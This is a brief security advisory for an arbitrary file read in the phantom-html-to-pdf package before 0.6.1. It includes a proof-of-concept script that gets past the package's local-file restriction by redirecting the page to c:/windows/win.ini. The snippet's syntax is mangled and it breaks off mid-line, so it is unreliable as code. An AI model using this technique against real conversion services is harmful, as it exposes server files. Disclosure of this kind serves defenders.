Arbitrary File Read in phantom-html-to-pdf
This affects the package phantom-html-to-pdf before 0.6.1. PoC js var fs = require'fs' var conversion = require"phantom-html-to-pdf"; conversion.allowLocalFilesAccess = false conversion html: "document.writewindow.location='c:/windows/win.ini'" , functionerr, pdf var output =...